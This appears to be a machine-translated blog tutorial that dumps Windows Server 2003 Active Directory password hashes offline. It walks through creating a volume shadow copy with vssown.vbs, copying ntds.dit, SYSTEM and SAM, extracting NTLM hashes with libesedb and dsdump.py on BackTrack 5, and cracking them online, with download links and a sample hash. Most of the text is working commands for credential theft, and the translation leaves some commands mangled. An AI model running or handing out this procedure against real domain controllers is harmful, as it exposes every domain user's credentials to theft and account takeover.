offline broken win2003 domain account password
Many methods are spoken in the domestic website. To share with you the experience of my experimental success.
This is done by following the Tim 's article, which is linked as follows:
Http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html
a experimental environment:windows server2003, domain environment
Construction method is very simple, Baidu search search.
Preparation Tool: Vssown.vbs,bt5,ntds_dump_hash.zip
Vssown.vbs Online Search
Http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip
http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z
Create a new domain user Xiaocaiwith the password set to 123abcabc
two win2003 under Extract Files
1, copy the Vssown.vbs to the domain server, such as copy to the desktop of the domain server.
2. Run cmd as Administrator and perform the following name:
CD Desktop
cscript//nologo vssown.vbs/start enabled
cscript//nologo vssown.vbs/status view run status
cscript//nologo vssown.vbs/create C Create a snapshot
cscript//nologo vssown.vbs/list View the snapshot information created
Here you can see the path inside the system, copying two Ntds.dit and system files to the desktop, where [X] is replaced with 5 .
Copy \\?\globalroot\device\harddiskvolumeshadowcopy[x]\windows\ntds\ntds.dit
Copy \\?\globalroot\device\harddiskvolumeshadowcopy[x]\windows\system32\config\system
Copy \\?\globalroot\device\harddiskvolumeshadowcopy[x]\windows\system32\config\sam
The extraction will be over on the file. There are often failures when trying here. There is no time to find information on what is the cause.
Delete the snapshot (this step is optional, it is recommended to delete)
cscript//nologo Vssown.vbs/delete {b3475a72-86d2-48ec-a22f-6e8dbb82903d}
Copy the 3 generated files.
three Extract HASH
Download the tool first, BT5, I'm using this virtual machine mirror phase
VMware Mirror 32-bit: http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z
Default login Password: Root/toor
Open SSH Service: (can be accessed with Se Cure CRT after opening service , convenient for file transfer)
Ssh-keygen-t rsa-f/etc/ssh/ssh_host_rsa_key
Ssh-keygen-t dsa-f/etc/ssh/ssh_host_dsa_key
Sshd-generate
/etc/init.d/ssh restart
A little off.
View IP with ifconfig
then use SeCure CRT access,
Press Alt+p open sftp and upload the file to/tmp
Cd/tmp
Put SYSTEM Ntds.dit Ntds_dump_hash.zip
Switch to BT5 System Label
CD/ tmp
Ls
# Unzip Ntds_dump_hash.zip
Unzip Ntds_dump_hash.zip
# Compile Libesedb
CD Libesedb
chmod +x Configure
./configure && Make
# Interpreting data Files Ntds.dit
CD Esedbtools
./esedbdumphash. /.. /ntds.dit
# Extract Hash
Cd.. /.. /creddump/
Python./dsdump.py. /system. /libesedb/esedbtools/ntds.dit.export/datatable
Extracted, found,
xiaocai:1109:8a79528ccd6e0dbffcd6b8db0f458c37:3b0de00581a39a49946206e0998b7df7:::
Four Crack Hash
crack Hash method A lot, here use website crack. Put the bold part on the website. Crack:http://www.objectif-securite.ch/en/ophcrack.php